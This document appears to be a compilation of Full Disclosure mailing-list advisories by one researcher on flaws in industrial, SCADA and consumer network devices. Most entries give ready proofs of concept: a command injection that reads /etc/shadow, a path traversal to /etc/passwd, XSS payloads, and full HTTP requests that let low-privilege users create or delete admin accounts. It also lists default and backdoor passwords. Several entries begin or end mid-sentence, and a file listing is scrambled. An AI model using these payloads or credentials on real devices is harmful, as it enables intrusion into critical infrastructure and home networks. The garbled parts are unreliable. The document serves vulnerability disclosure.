The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login ­ tw ­ is not active though. Anyone could use the default password to
gain administrative control through the Telnet service of the system (when
enabled) leading to integrity, loss of confidentiality, or loss of
availability.

*3.Sensitive info leakage via device running configuration backup *
*CVE-ID*: CVE-2015-7247

Usernames, Passwords, keys, values and web account hashes (super & admin)
are stored in clear­text and not masked. It is noted that restricted
'support' user may also access this config backup file from the portal
directly, gather clear-text admin creds, and gain full, unauthorized access
to the device.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Sensitive Info Vulnerabilities

[Karn Ganeshen]

GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text
Storage of Sensitive Information Vulnerabilities

*Timelines:*
Reported to ICS-CERT on: July 06, 2015
Fix & Advisory Released by GE: January 25, 2015
Vulnerability ID: GEIS16-01

*GE Advisory: *
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf
<http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical%7CGEIS_SNMP%7CPDF&filename=GEIS_SNMP.pdf>


*ICS-CERT Advisory:*In Progress

*About GE*

GE is a US-based company that maintains offices in several countries around
the world.

The affected product, SNMP/Web Interface adapter, is a web server designed
to present information about the Uninterruptible Power Supply (UPS).
According to GE, the SNMP/Web Interface is deployed across several sectors
including Critical Manufacturing and Energy. GE estimates that these
products are used worldwide.

*Affected Products*

• All SNMP/Web Interface cards with firmware version prior to 4.8
manufactured by GE Industrial Solutions.

*CVE-IDs:*
CVE-2016-0861
CVE-2016-0862


*VULNERABILITY OVERVIEW*
A


*COMMAND INJECTIONCVE-2016-0861*
Device application services run as (root) privileged user, and does not
perform strict input validation. This allows an authenticated user to
execute any system commands on the system.

Vulnerable function:
http://IP/dig.asp <http://ip/dig.asp>

Vulnerable parameter:
Hostname/IP address


*PoC:*
In the Hostname/IP address input, enter:
; cat /etc/shadow

Output
root::0:0:root:/root:/bin/sh
<...other system users...>
ge::101:0:gedeups7:/home/admin:/bin/sh
root123::102:0:gedeups2:/home/admin:/bin/sh

B


*CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862*
File contains sensitive account information stored in cleartext. All users,
including non-admins, can view/access device's configuration, via Menu
option -> Save -> Settings.

The application stores all information in clear-text, including *all user
logins and clear-text passwords*.


+
I sent it out on Jan 29 but for some reason, it was not posted to FD. So
sending it again.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SeaWell Networks Spectrum - Multiple Vulnerabilities

[Karn Ganeshen]

About SeaWell Networks Spectrum

Session Delivery Control

SeaWell set out to improve the way operators control, monetize and scale
their IP video offerings, to meet the growing subscriber demands for video
delivered to smartphones, tablets and game consoles.

The result – Spectrum – is what we call a “Multiscreen 2.0” Session
Delivery Controller.

Spectrum is high-performance, carrier-grade software that takes ABR video
and repackages it – on-the-fly – into any other protocol, including Apple
HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.

http://www.seawellnetworks.com/spectrum/

*Affected version*
Spectrum SDC 02.05.00
Build 02.05.00.0016
Copyright (c) 2015 SeaWell Networks Inc.

*A. CWE-255: Credentials Management*
*CVE-2015-8282*

Weak, default login credentials - admin / admin

*B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')*
*CVE-2015-8283*

The configure_manage.php module accepts a file parameter which takes an
unrestricted file path as input, allowing an attacker (non-admin, low-
privileged user) to read arbitrary files on the system.

*PoC:*

https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd

*C. CWE-285: Improper Authorization*
*CVE-2015-8284*

A low privileged, non-admin user, with only viewer privileges, can perform
administrative functions, such as create, update, delete a user (including
admin user), or access device's configuration files (policy.xml,
cookie_config.xml, systemCfg.xml). The application lacks Authorization
controls to restrict any non-admin users from performing admin functions.

The application users can have admin or viewer privilege levels. Admin has
full access to the device. Viewer has access to very restricted functions.

It is possible for a viewer priv user to perform admin functions.

*PoC:*

Add new user [Admin function only]

GET
/system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow=
HTTP/1.1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

Here

admin -> userlevel=9
viewer -> userlevel=1

*Create new user with Admin privs*
Log in as viewer - try create new admin user - viewer1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

0*Success*
1

*Delete user*

https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

*Modify existing user (including admin)*
log in as viewer - try change system (admin) user

https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

0*Success*
1

*Change Admin password*
log in as viewer - try change admin pass

https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3

0*Success*
1

*Downloading configuration xml files*

viewer priv user has no access/option to config xmls via GUI. It is
possible to download the configs by calling the url directly

*Access policy config xml*
https://IP/configure_manage.php?action=download_config&file=policy.xml

*Access cookie config xml*
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml

*Access system config xml*
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml

+
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] eWON sa Industrial router - Multiple Vulnerabilities

[Karn Ganeshen]

ig updated.

*Issue 3*

*Deleting All Users*
It is possible for a user with no rights to:

1. Enumerate configured users
2. Delete any & all users.

HTTP GET request to delete a user (when logged in as 'test') (unauthorized
request)

http:///rcgi.bin/EditForm?CB2=3&NbCB=4&Opera2onType=DeleteUser

This brings up a confirmation prompt validating if we really want to delete
the user.

It presents the username and offers two options -
Option 1 - Cancel and Confirm/Delete
Option 2 - Select Confirm/Delete
.
Users List test
Please confirm you want to delete these items Select Confirm/Delete
.

Next, the url redirects to DeleteForm which then shows Access denied twice
. http:///rcgi.bin/DeleteForm
Access denied
Access denied
.
-> But the user gets deleted anyway. :) Verify by Refreshing User List


*Enumerating Users*
In order to enumerate valid users, we only need to submit the first
DeleteUser request

http:///rcgi.bin/EditForm?CB2=4&NbCB=3&Opera2onType=DeleteUser

It will show the username.

This process can of course be automated to view all valid application
usernames.
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..

*eWON considered WEAK RBAC issue a minor one. Apparently, they didn’t
understood the impact at all.*
eWON said:
It's a minor issue as these informations are already available through eWON
User Manual. We will however completely block the page in a future eWON
firmware release when user credentials don't meet the requirements to avoid
any ambiguity regarding eWON security.

—> Regardless, the new firmware says this issue has been fixed..

…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..

*STORED CROSS-SITE SCRIPTING - NOT FIXED by eWON*
CVE-2015-7927


*Vulnerable functions / parameters*
Create / Edit User
User First Name
User Last Name
User information
Create / Edit Tag
Tag Description
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
eWON says

Verified.
Won't fix: We left the possibility to include HTML tags or javascript in
form fields and form url parameters to meet some specific final user needs.
Note that this kind of injection is achievable through FTP upload as
everything is saved in the eWON config files. Furthermore all theses XSS
exploit also require valid user authentication and rights.

—> Yeah, it’s a feature and input validation is a useless practice anyway..
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..


*Reflected XSS - NOT FIXED by eWON*
Vulnerable parameter - AST_ErrorMsg

http:///rcgi.bin/wsdForm?sys_Csave=1&AST_ErrorMsg=Successalert("xss-AST_ErrorMsg")&sys_IpMbsSrvPort=502&sys_IpEipSrvPort=44818&sys_IpIsoSrvPort=102&
sys_IpFinsSrvPort=9600&sys_TagPollMode=0&sys_IOTcpDefTO=1000&btUpdate=
Update

*PASSWORDS NOT SECURED - PARTIAL FIX by eWON*
CVE-2015-7928

Passwords are passed in plain text allowing a malicious party to retrieve
them from network traffic. The autocomplete setting of some eWON forms also
allows these passwords to be retrieved from the browser. Compromise of the
credentials would allow unauthenticated access.
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
eWON says

2. Won't fix as the final user is supposed to configure eWON through VPN.
—> Yeah, *supposed to*..
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..

*POST/GET ISSUES - NOT FIXED by eWON*
CVE-2015-7929

eWON firmware web server allows the use of the HTML command GET in place of
POST. GET is less secure because data that are sent are part of the URL.
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
eWON says
Won't fix. This could be a problem regarding CRSF (issue B) but the final
user is supposed to configure eWON through VPN (and thus https).

Mitigating factors:

This could be an issue regarding the CSRF attacks described above. However
as already mentioned the eWON firmware exposure to CSRF attacks is really
limited. Thus having equivalent POST and GET parameters handling for each
request sent to the eWON webserver is by extension not problematic.

—> Yeah, *supposed to*.. Not problematic...
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS

[Karn Ganeshen]

*Nordex NC2 XSS Vulnerability*

*AFFECTED PRODUCTS*
Nordex Control 2 (NC2) SCADA V16 and prior versions.

Nordex is a company based in Germany that maintains offices in countries
around the world.

The affected product, Nordex Control 2, is a web-based SCADA system for
wind power plants. According to Nordex, NC2 is deployed across the Energy
sector. Nordex estimates that this product is used primarily in the United
States, Europe, and China.


*CVE-ID*
CVE-2015-6477

*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01

*Vulnerable parameter*
username

*PoC*

POST /login HTTP/1.1

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] XZERES 442SR Wind Turbine XSS

[Karn Ganeshen]

XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability

*AFFECTED PRODUCTS*
XZERES is a US-based energy company that maintains offices in several
countries around the world, including the UK, Italy, Japan, Vietnam,
Philippines, and Myanmar.

The affected product, 442SR Wind Turbine, has a web-based interface system.
According to XZERES, the 442SR is deployed across the Energy sector. XZERES
estimates that this product is used worldwide.

*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01

*Vulnerable parameter*
id

*PoC*

http:///details?object=Inverter&id=2alert(xss-id-parameter")

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] LG Nortel ADSL modems - Multiple vulnerabilities

[Karn Ganeshen]

# Title: [LG Nortel ADSL modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [NA]
# Version Reported: [Board ID: DV2020]+Product Version: S1.064B2.3H0-0 +
Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e]

*Timelines*
April, 2015: Vulnerabilities found
April 2015: Reported to Optus & CERT
April - October 2015: CERT (US/AUS) attempts to identify vendor / device
ownership. None found.
Dec 03, 2015: Public disclosure

*CVE-IDs*
None (Mitre..?)

*Note*:
After several months, vendor ownership for this device still remains
unknown/unconfirmed.

Regardless, it is currently in use, deployed by Optus (Australia), with
possibly 20-30% of customer base (primarily broadband services - home users
/ SOHO). So, quite a number up there.

There may be others but I & CERT are not aware of such.

*Device Info*
Board ID: DV2020
Product Version: S1.064B2.3H0-0
Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e
Bootloader (CFE) Version: 1.0.37-4.3
Wireless Driver Version: 3.131.35.0.cpe0.0Board ID: DV2020


*Vulnerabilities*

Authorization flaws, Sensitive Information Disclosure, Insecure
configuration, Denial of Service


*1. Authorization Flaws (HTTP)*

1.1 *Non-admin users can access restricted, Administrative functionality
(accessible to Admin only)*

LG-Nortel ADSL modem allows three (3) users with different privilege levels
for administering the device. Administrative ‘admin’ user has complete
privileges to access and perform all functions on the modem. Other
non-admin users – ‘support’ and ‘user’ – have restricted functional access
and can perform limited functions.

A non-admin ‘user’ does not have access to administrative functions via GUI
menu, i.e. there are no administrative function links *seen/visible* in the
home page.

However, the application lacks sufficient Authorization controls and a
‘user’ can still access the administrative functionality via direct url
access.

For example, a non-admin ‘user’ does not have a menu option to access the
device configuration file. However, it can still access the file -
*backupsettings.conf* - by directly accessing the url – http://
/backupsettings.conf.

With access to this configuration file, a low-privileged ‘user’ can easily
access login passwords for ‘admin’ and any other valid users of the modem.
The login passwords are stored in base64-encoded format, which is a weak
scheme to secure passwords, and clear-text password(s) can be easily
obtained.

In a similar manner, low-privileged ‘user’ and ‘support’ logins can also
access other administrative functions.

1.2 *Application does not secure sensitive configuration details from
non-admin ‘user’ (HTTP)*

The application allows read-only access to ‘user’ login. However, sensitive
configuration information such as passwords, keys etc is not restricted
from the user. All configuration details are readily accessible and
readable to ‘user’ login.

1.3 *Password Change - Clear-text Password Disclosure*

The application does not secure the newly changed password. Once password
is changed,  the application reveals the new password in address bar, as:

http:///password.cgi?sptPassword=


This HTTP request contains new, valid password in clear-text.


*2. Application does not secure configured passwords (HTTP)*

The application relies on client-side checks only - which can be easily
bypassed - to hide juicy info like service accounts and respective
passwords, etc. These passwords are masked and only * were shown in the
corresponding fields.

The following HTTP GET request shows capture of *masked *SIP / voip
password(s):

 GET /voicesipset.cmd?proxyAddr=sip11.yesphone.optus.com.au
&proxyPort=5060®Addr=sip11.yesphone.optus.com.au
®Port=5060&extension1=&extension2=&password1=<
password-removed>&password2
=&ifName=ppp_8_32_1&servermode=proxy&telurl=sip®expiry=1800&hostname=
sip11.xxx.xxx.com.au&localport=5060&display1=
&display2=&authuser1=&authuser2= HTTP/1.1


*3. Insecure configuration (Telnet)*

3.1 *No separation of privileges*

After logging in over Telnet as ‘user’, the system still permits running
system level commands and to read sensitive files from the file-system.

- *shadow* is not used, all hashes are stored in *passwd* readable by
everyone, and all system users are uid 0, gid 0, root privileged
superusers. :)


3.2 *Application does not secure sensitive configuration details from
‘user’*

The application permits ‘user’ login to view sensitive information in
modem’s configuration. To view configuration, Telnet administrative console
provides a command - *dumpcfg* - to ‘user’. Running this command as ‘user’
login dumps the device configuration information. This information includes
sensitive information such as passwords and keys - all in clear-text.


*4. Authorization flaws + Denial of Service (Telnet)*

After logging in to the modem, *passwd* command can be used to change
passwords 

[FD] Brocade Fabric OS v6.3.1b Multiple Vulnerabilities

[Karn Ganeshen]

# Title: [Brocade Fabric OS v6.3.1b - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.brocade.com]
# Versions Reported: Kernel 2.6.14.2 + FabOS v6.3.1b + BootProm 1.0.9

> *version*
Kernel: 2.6.14.2
Fabric OS:  v6.3.1b
BootProm:   1.0.9

1 *Default diagnostic accounts*
root and factory with default passwords documented in respective admin
guides. By default, both these users are not restricted and can SSH /
telnet in to the box.

2 *unix-passwd-in-etc-passwd*
Password hashes found in /etc/passwd files (All user hashes)

3 *unix-uid-0-accounts*
Multiple users have UID 0 privs

4 *unix-world-writable-files*
Multiple world writable files are present:
/etc/fabos/hil_wwn
/etc/fabos/cfgsave/factory/etc/hosts
/etc/raslog.ext
/etc/raslog.int
/etc/ipadmd_log.txt
/etc/hosts.0

5 *unix-user-home-dir-mode - weak access permissions*
The permissions for home directory of user basicswitchadmin was found to be
755 instead of 750.

6 *generic-passwd-shadow-group-file-permissions - weak access permissions*
The permission of file '/etc/shadow' is not 400.

7 *unix-partition-mounting-weakness*

/tmp partition does not have 'nosuid' option set.
/tmp partition does not have 'noexec' option set.
/tmp partition does not have 'nodev' option set.
/mnt partition does not have 'nodev' option set.

8 *unix-suid-writable*
Following world-writable suid files were found on the system:
/etc/fabos/hil_wwn(-r-xrw-rw-)

9 *unix-suid-script*
Multiple scripts with suid set were found on the system:

, wwn /fabos/sbin/coreshow /fabos/sbin/timeLineGet /fabos/bin/getIpAddr.sh
/fabos/ , , bin/userConfig /fabos/cliexec/authCmds /fabos/cliexec/config
/fabos/cliexec/conf , , igCmd /fabos/cliexec/configure
/fabos/cliexec/fcping /fabos/cliexec/fpcmd /fabos , , /cliexec/haadm
/fabos/cliexec/helpcmds /fabos/cliexec/ipAddr /fabos/cliexec/kill , ,
telnet /fabos/cliexec/ms /fabos/cliexec/savecore /fabos/cliexec/secCmds
/fabos/c , , /fabos/sbin/coreshow, /fabos/sbin/timeLineGet,
/fabos/cliexec/killtelnet, /fabos/cliexec/savecore,
/fabos/cliexec/ssave.sh, , supportsave /fabos/cliexec/supportsavestatus
/fabos/cliexec/switchcmd /fabos/cli , , exec/syscmd
/fabos/cliexec/trace_cli /fabos/standby_sbin/coreshow /fabos/libexec , ,
/coreffdc.sh /fabos/libexec/ethmode /fabos/libexec/getDefaultFID
/fabos/libexec/ , , ipc_showAll /fabos/libexec/secRoleCheck
/fabos/etc/swInst /fabos/webtools/htdocs , , /weblinker.fcg
/var/log/rcslog.old /var/log/fdmilog.txt /var/log/ficulog.txt /va , ,
r/log/nslog.txt /var/log/rcslog.txt /var/log/seclog.txt
/var/log/zonelog.txt && , , /fabos/cliexec/supportsavestatus,
/fabos/standby_sbin/coreshow, /fabos/libexec/coreffdc.sh,
/fabos/libexec/ipc_showAll, , g.txt /var/log/esslog.old
/var/log/ficulog.old /var/log/fdmilog.old /var/log/ess , , log.txt
/var/log/nslog.old /var/log/seclog.old /var/log/zonelog.old /var/log/snm ,
, plog.old /bin/passwd /bin/login /bin/login.nopam /bin/ping /sbin/fuser
/sbin/boo , , tenv /usr/bin/du /usr/bin/ppname /usr/bin/rcp /usr/bin/rlogin
/usr/bin/rsh, sr/sbin/sendmail
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Cambium ePMP 1000 - Multiple Vulnerabilities

[Karn Ganeshen]

validate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server

{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",

…

…
}

.


Best Regards,

Karn Ganeshen

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ZTE ADSL modems - Multiple vulnerabilities

[Karn Ganeshen]

*ZTE ADSL modems - Multiple vulnerabilities*

Confirmed on 2 (of multiple) software versions - *W300V2.1.0f_ER7_PE_O57
and W300V2.1.0h_ER7_PE_O57*

1 *Insufficient authorization controls*

*CVE-ID*: CVE-2015-7257

Observed in Password Change functionality. Other functions may be
vulnerable as well.

*Expected behavior:*

Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.

*Vulnerability:*

Any non-admin user can change 'admin' password.


*Steps to reproduce:*

a. Login as user 'support' password XXX

b. Access Password Change page - http:///password.htm

c. Submit request

d. Intercept and Tamper the parameter ­ username ­ change from 'support' to
'admin'

e. Enter the new password ­> old password is not requested ­> Submit

­> Login as admin

-> Pwn!



2 *Sensitive information disclosure - clear-text passwords*

Displaying user information over Telnet connection, shows all valid users
and their passwords in clear­-text.

*CVE-ID*: CVE-2015-7258

*Steps to reproduce:*

$ telnet 

Trying ...

Connected to .

Escape character is '^]'.

User Access Verification

Username: admin

Password: <­­­ admin/XXX1

$sh

ADSL#login show <--­­­ shows user information

Username Password Priority

adminpassword1 2

support  password2 0

admin password3 1



3 *(Potential) Backdoor account feature - **insecure account management*

Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.

*CVE-ID*: CVE-2015-7259

It is considered as a (redundant) login support *feature*.


*Steps to reproduce:*

$ telnet 

Trying ...

Connected to .

Escape character is '^]'.

User Access Verification

User Access Verification

Username: admin

Password: <­--­­ admin/password3

$sh

ADSL#login show

Username  Password  Priority

admin  password1  2

support  password2  0

admin  password3  1

+

Best Regards,

Karn Ganeshen
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities

[Karn Ganeshen]

# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [No process to handle vuln reports]
# Vendor Homepage: [
http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]


**Vulnerability Details**

*1. Default, weak passwords for http and ftp services *

a. *HTTP accounts*
- admin/password
- user/user
- guest/airocon














 






 

* -> last four digits of MAC address *

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
- user/user







 







 







 


2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.

For HTTP, 'guest' with attribute , is the backdoor
account. This is seen in the config file:









This user is not shown / visible in the user list when logged in as admin
(privileged user).


3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.

It is possible to silently execute HTTP requests if the user is logged in.


4. *Weak RBAC controls *

5a) *A non-admin user (user) can create and delete any other users,
including root-privileged accounts. *

There are three users:

admin:password -> priv 2 is super user account with full functional access
(admin/root)
user:user -> priv 0 -> can access only some functions (user)
guest:airocon -> privileged backdoor login


*Normally: *

- user can create new account with restricted user privs only.
- user can change its password and only other non-admin users.
- user can delete any other non-admin users.

However, the application does not enforce strict rbac and it is possible
for a non-admin user to create a new account with admin privileges.


This is done as follows:

1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)
- Submit request
3. When the new admin user is created successfully, it does not show up in
user list
4. Confirm via logging in as new admin, and / or configured accounts in
configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=


*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
higher privileged account.

*Note2*: In some cases, application does not create admin priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.


*Delete user http request:*
A non-admin user can delete any configured user(s) including privileged
users (admin).

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%


In case (non-admin) user is deleting the admin login (priv 2), action
status can be confirmed by checking the configuration.
In case (non-admin) user is deleting another user login (priv 0), action
status can be confirmed by checking the user list.


5b) *(non-admin priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:

http:///fw-macfilter.htm

Other functions may also be accessible in this manner.


6. *Sensitive information not secured from low privileged users *

A non-admin privileged user has access to download the configuration file
- config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in c

[FD] netis RealTek wireless router / ADSL modem Multiple Vulnerabilities

[Karn Ganeshen]

# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]


**Vulnerability Details**

* 1. Default, weak passwords for http and ftp services *

a. *HTTP accounts*
- guest/guest
- user/user
- guest/airocon













 






 

* -> last four digits of MAC address *

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
- user/user







 







 







 


2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.

For HTTP, 'guest' with attribute , is the backdoor
account. This is seen in the config file:









This user is not shown / visible in the user list when logged in as guest
(privileged user).


3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.

It is possible to silently execute HTTP requests if the user is logged in.


4. *Weak RBAC controls *

5a) *A non-root/non-admin user (user) can create and delete any other
users, including root-privileged accounts. *

In netis RealTek wireless router ADSL modem, there are three users:

guest:guest -> priv 2 is super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:airocon -> privileged backdoor login


*Normally: *

- user can create new account with restricted user privs only.
- user can change its password and only other non-root users.
- user can delete any other non-root users.

However, the application does not enforce strict rbac and it is possible
for a non-root user to create a new user with root privileges.


This is done as follows:

1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) -
Submit request
3. When the new root user is created successfully, it does not show up in
user list
4. Confirm via logging in as new root, and / or configured accounts in
configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=



*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
root privileged account.

*Note2*: In some cases, application does not create root priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.


*Delete user http request:*
A non-root/non-admin user can delete any configured user(s) including
privileged users (guest).

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%



In case (non-root) user is deleting a root login (guest, priv 2), action
status can be confirmed by checking the configuration In case (non-root)
user is deleting a user login (priv 0), action status can be confirmed by
checking the user list.


5b) *(non-root priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:

http:///fw-macfilter.htm

Other functions may also be accessible in this manner.


6. *Sensitive information not secured from low privileged users *

A non-root / non-admin privileged user has access to download the
configuration file - config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *, it